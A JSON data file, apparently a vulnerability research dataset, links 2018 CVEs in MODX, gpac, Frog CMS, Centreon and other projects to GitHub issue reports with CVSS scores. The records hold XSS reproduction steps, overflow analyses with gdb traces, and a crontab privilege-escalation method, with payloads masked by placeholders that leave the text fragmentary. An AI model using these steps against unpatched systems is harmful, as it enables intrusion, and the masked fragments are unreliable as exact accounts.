        "description": "Stored XSS: User Photo. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce Under Manage > Users sources choose Create New User and enter the Xss Payload ERRORTAG in the User Photo field and click on save. The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20757",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14104",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14104",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2018-10-02T04:10:21Z",
        "description": "Stored XSS: extended user fields. Container name ERRORTAG Attribute name ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20758",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14103",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14103",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2018-10-02T04:04:29Z",
        "description": "Stored XSS: User Settings. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20760",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1177",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1177",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-13T10:41:00Z",
        "description": "OOB issues of gf_text_get_utf8_line. In gf_text_get_utf8_line function, gf_utf8_wcstombs return NUMBERTAG with crafted srt file, it will cause APITAG NUMBERTAG out of bound write PATHTAG gdb APITAG GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from APITAG (gdb) set args add crafted.srt overview.mp4 (gdb) r Starting program: PATHTAG add crafted.srt overview.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Program received signal SIGBUS, Bus error NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) bt NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG c6 in gf_text_import_srt (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG bd NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG a in import_file (dest NUMBERTAG d NUMBERTAG APITAG APITAG import_flags NUMBERTAG force_fps NUMBERTAG frames_per_sample NUMBERTAG at APITAG NUMBERTAG bdac in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG e in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20761",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1186",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1186",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-22T02:44:19Z",
        "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_sm_load_init () function, scene_manager.c APITAG APITAG load) { \u2026\u2026 ext = (char )strrchr(load APITAG '.'); if (!ext) return GF_NOT_SUPPORTED; if (!stricmp(ext, \".gz\")) { char anext; ext NUMBERTAG anext = (char )strrchr(load APITAG '.'); ext NUMBERTAG ext = anext; } APITAG &ext NUMBERTAG buffer overflow here. \u2026\u2026 } PATHTAG APITAG inctx APITAG out FILETAG add overview.srt overview.mp4 Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG stack smashing detected : APITAG terminated Aborted (core dumped) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20762",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1187",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1187",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-22T02:47:42Z",
        "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in cat_multiple_files () function, fileimport.c APITAG APITAG dest, char APITAG u NUMBERTAG import_flags, Double force_fps, u NUMBERTAG frames_per_sample, char tmp_dir, Bool force_cat, Bool align_timelines, Bool allow_add_in_command) { \u2026\u2026 if (sep) { APITAG sep); // buffer overflow here. sep NUMBERTAG PATHTAG APITAG cat cat APITAG add overview.srt overview.mp4 Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Segmentation fault (core dumped) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20763",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1188",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1188",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-22T03:05:37Z",
        "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_text_get_utf8_line () function, text_import.c in line NUMBERTAG of gf_text_import_srt, parameter APITAG is NUMBERTAG but in gf_text_get_utf8_line (), the size of APITAG is NUMBERTAG so, when the size of APITAG is more than NUMBERTAG the buffer of APITAG will overflow NUMBERTAG char sOK = APITAG NUMBERTAG srt_in, unicode_type); char gf_text_get_utf8_line(char APITAG u NUMBERTAG APITAG FILE txt_in, s NUMBERTAG unicode_type) { \u2026\u2026 char APITAG \u2026\u2026 len = (u NUMBERTAG APITAG // len might be more than NUMBERTAG for (i NUMBERTAG i APITAG NUMBERTAG j may more than NUMBERTAG here j++; APITAG NUMBERTAG bf; } \u2026\u2026 } PATHTAG APITAG srt NUMBERTAG crafted_text.srt Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG stack smashing detected : APITAG terminated Aborted (core dumped) PATHTAG gdb APITAG GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from APITAG (gdb) set args srt NUMBERTAG crafted_text.srt (gdb) b APITAG No source file named text_import.c. Make breakpoint pending on future shared library load? (y or [n]) y Breakpoint NUMBERTAG APITAG pending. (gdb) r Starting program: PATHTAG srt NUMBERTAG crafted_text.srt APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Breakpoint NUMBERTAG gf_text_get_utf8_line APITAG NUMBERTAG n\", APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) c Continuing. Breakpoint NUMBERTAG gf_text_get_utf8_line APITAG NUMBERTAG n\", APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) c Continuing. Breakpoint NUMBERTAG gf_text_get_utf8_line ( APITAG \"hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello wo\"..., APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) p j NUMBERTAG gdb) c Continuing. stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG b7c NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20772",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/24",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/24",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T08:40:52Z",
        "description": "The APITAG NUMBERTAG has command execution in URLTAG The APITAG NUMBERTAG has command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp APITAG in body FILETAG NUMBERTAG open URLTAG NUMBERTAG layout choose none FILETAG NUMBERTAG open FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20773",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/23",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/23",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T08:19:04Z",
        "description": "The APITAG NUMBERTAG has Command execution in URLTAG The APITAG NUMBERTAG has Command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp APITAG in body FILETAG NUMBERTAG save and close NUMBERTAG open PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20774",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/26",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/26",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T13:14:02Z",
        "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG body NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp ERRORTAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20775",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/27",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/27",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T14:10:40Z",
        "description": "The APITAG NUMBERTAG has command execution in URLTAG The APITAG NUMBERTAG has command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG click Create new file FILETAG NUMBERTAG input FILETAG FILETAG NUMBERTAG open FILETAG input APITAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20776",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/21",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/21",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-29T06:30:18Z",
        "description": "Frog CMS NUMBERTAG has Information Disclosure Vulnerability in frogcms/public. Direct access APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20777",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/25",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/25",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T13:07:32Z",
        "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG body NUMBERTAG login NUMBERTAG open URLTAG body NUMBERTAG input exp APITAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20778",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/28",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/28",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-31T14:30:17Z",
        "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG create new file NUMBERTAG open and input exp ERRORTAG FILETAG NUMBERTAG save NUMBERTAG open URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20782",
        "Issue_Url_old": "https://github.com/GloBee-Official/woocommerce-payment-api-plugin/issues/3",
        "Issue_Url_new": "https://github.com/globee-official/woocommerce-payment-api-plugin/issues/3",
        "Repo_new": "globee-official/woocommerce-payment-api-plugin",
        "Issue_Created_At": "2019-02-19T10:43:57Z",
        "description": "Public disclosure on CVETAG Payment Bypass / Unauthorized Order Status Spoofing]. CVETAG Reliance on untrusted inputs ([ CVETAG CVETAG , insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback allow remote ( even _unauthorized_ ) attacker to bypass payment process and spoof real order status without actually paying for it. Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: APITAG NUMBERTAG APITAG NUMBERTAG FILETAG APITAG of Concept APITAG APITAG APITAG (php): APITAG PATHTAG APITAG APITAG (shell): CODETAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20786",
        "Issue_Url_old": "https://github.com/vim/vim/issues/3711",
        "Issue_Url_new": "https://github.com/vim/vim/issues/3711",
        "Repo_new": "vim/vim",
        "Issue_Created_At": "2018-12-24T07:53:42Z",
        "description": "Possible NPD error . Hi, recently I use fuzzing to check the vim and I find an NPD problem. In PATHTAG APITAG This could return a null pointer for the caller function vterm_obtain_screen and store in the vt >screen. APITAG This null screen is return to create_vterm function in src/terminal.c APITAG then again in vterm_screen_set_callbacks function defined in PATHTAG APITAG The callback function is set to a null pointer screen. The potential problem is that you can set a callback function to a predefined NULL memory address which might lead to more problem. I wonder this is a true problem in vim or not, could you help to verify it? I am looking forward to your reply!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20787",
        "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/991",
        "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/991",
        "Repo_new": "micode/xiaomi_kernel_opensource",
        "Issue_Created_At": "2018-12-19T14:14:05Z",
        "description": "Integer overflow in perseus p oss. There is a suspected integer overflow vulnerability in the tpdbg_write method in PATHTAG When the NUMBERTAG rd argument CODETAG size' or ZERO_SIZE_PTR is possibly required to fix this issue.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20788",
        "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/973",
        "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/973",
        "Repo_new": "micode/xiaomi_kernel_opensource",
        "Issue_Created_At": "2018-11-18T13:57:18Z",
        "description": "Integer overflows in the led driver of the daisy o oss branch. There are several suspected integer overflow bugs in PATHTAG line NUMBERTAG The led id may be equal to or greater than the integer length (depends on the target arch), which causes integer overflow when using the left shift operation NUMBERTAG led >id\". Possible solution for this case would be to cast the integer NUMBERTAG to a data type of larger length before shifting it with led >id.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20806",
        "Issue_Url_old": "https://github.com/lota/phamm/issues/24",
        "Issue_Url_new": "https://github.com/lota/phamm/issues/24",
        "Repo_new": "lota/phamm",
        "Issue_Created_At": "2018-03-20T12:36:33Z",
        "description": "Reflected XSS in Phamm login page. Reflected Cross Site Scripting Issue : Cross Site Scripting (XSS) attack is a type of injection attack, in which malicious code is injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side code, to a different end user. The end user\u2019s browser has no way to know that the code should not be trusted, and will execute the code. Because the end user thinks the script came from a trusted source, the malicious code can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. This code can even rewrite the content of the HTML page. Proof Of Concept : URL : URLTAG FILETAG Reason for this issue is $action is not sanitised and is reflected inside the title.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20819",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/112",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/112",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2018-07-17T02:42:05Z",
        "description": "APITAG heap buffer overflow at APITAG POCs: URLTAG URLTAG ASAN output ( ERRORTAG ): ERRORTAG When running without ERRORTAG , it crashes with invalid system call message.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20820",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/111",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/111",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2018-07-17T02:38:50Z",
        "description": "Integer Overflow at PATHTAG We found with our fuzzer an interger overflow error inside APITAG from jpgcoder.cc when feeding lepton NUMBERTAG f6d NUMBERTAG c with a crafted lep file. POC: URLTAG When running ERRORTAG , it output the messages: ERRORTAG When running APITAG , it crashes with message like: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20821",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2658",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2658",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-02T07:13:45Z",
        "description": "Stack over flow errors when creating APITAG We found with our fuzzer some stack over flow errors when constructing APITAG at Line NUMBERTAG in parser.cpp APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG sample inputs: FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20822",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2671",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2671",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T04:54:21Z",
        "description": "APITAG stack overflow at APITAG APITAG We found with our fuzzer some stack over flow errors at APITAG APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20840",
        "Issue_Url_old": "https://github.com/google/google-api-cpp-client/issues/57",
        "Issue_Url_new": "https://github.com/google/google-api-cpp-client/issues/57",
        "Repo_new": "google/google-api-cpp-client",
        "Issue_Created_At": "2018-08-10T00:58:24Z",
        "description": "Error on 'exp' type handling in ID Token . Problem: The following errors occurred during the attempt to request ID Token with specifying \u2018profile\u2019 or \u2018email\u2019 in SCOPES parameter. ERRORTAG Cause: When receiving ID Token from Google APITAG Server, \u2018exp\u2019 in the token is representing the type of integer. Unfortunately, 'google api cpp client' deals with it as a string type; it causes the above problem. For your information, I attached the format of ID Token received from the server. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20843",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/186",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/186",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2018-01-25T15:38:40Z",
        "description": "NUMBERTAG k xml file uses NUMBERTAG G memory. valgrind tool=massif xmlwf FILETAG reports that xmlwf uses NUMBERTAG G of memory to load this bogus xml document. FILETAG This was reported by oss fuzz against APITAG ( CVETAG which uses expat and has the same memory use so I felt I should pass it on.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20962",
        "Issue_Url_old": "https://github.com/Laravel-Backpack/CRUD/issues/1297",
        "Issue_Url_new": "https://github.com/laravel-backpack/crud/issues/1297",
        "Repo_new": "laravel-backpack/crud",
        "Issue_Created_At": "2018-03-22T21:05:42Z",
        "description": "Cross site scripting vulnerability. Bug report Relational columns (select) renders html which allows scripts to be executed! FILETAG What I did: CODETAG What I expected to happen: The column should escape all html, and render it as text. What happened: If the team name contains html and javascript, e.g: APITAG Then the alert will pop up if that column is rendered on the page. What I've already tried to fix it: APITAG CODETAG Backpack, Laravel, PHP, DB version: APITAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20999",
        "Issue_Url_old": "https://github.com/brycx/orion/issues/46",
        "Issue_Url_new": "https://github.com/orion-rs/orion/issues/46",
        "Repo_new": "orion-rs/orion",
        "Issue_Created_At": "2018-12-20T17:00:06Z",
        "description": "APITAG not working correctly. Currently APITAG checks whether or not the state is already finalized. If it is not finalized, it will not reset the state. So if someone were to call APITAG after not having finalized the state before, incorrect results would be produced. Such streaming states include hmac , APITAG , APITAG and cshake .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-21015",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1179",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1179",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-15T06:54:00Z",
        "description": "SEGV in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master NUMBERTAG ad NUMBERTAG Compile cmd APITAG APITAG Triggered by APITAG POC file: URLTAG gdb info: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-21016",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1180",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1180",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-15T07:16:20Z",
        "description": "APITAG heap buffer overflow in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master NUMBERTAG ad NUMBERTAG Compile cmd: ERRORTAG make Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG GDB info: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-21017",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1183",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1183",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-12-17T15:51:57Z",
        "description": "APITAG memory leaks of APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master d1c4bc3) Compile cmd: ERRORTAG APITAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-21025",
        "Issue_Url_old": "https://github.com/centreon/centreon/issues/7082",
        "Issue_Url_new": "https://github.com/centreon/centreon/issues/7082",
        "Repo_new": "centreon/centreon",
        "Issue_Created_At": "2018-12-21T15:05:56Z",
        "description": "[security] Privilege Escalation from crontab. BUG REPORT INFORMATION OS : Centreon Central NUMBERTAG el7 Vulnerability The crontab deployed when installing the package or when using the VM executes a perl script as root every day to backup the database: APITAG In this perl script, there are two command executions that use a path defined by a configuration file: CODETAG But the permissions to this configuration are too open, as the group may write to it: APITAG This leads to a privesc to root from any user from the centreon group, of which apache is conveniently a member of: APITAG For instance, apache could change the path in the configuration file to execute a script to get sudo rights when the DB is saved: CODETAG It's realistic that apache would be the account to privesc from because of RCEs in Centreon's codebase.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
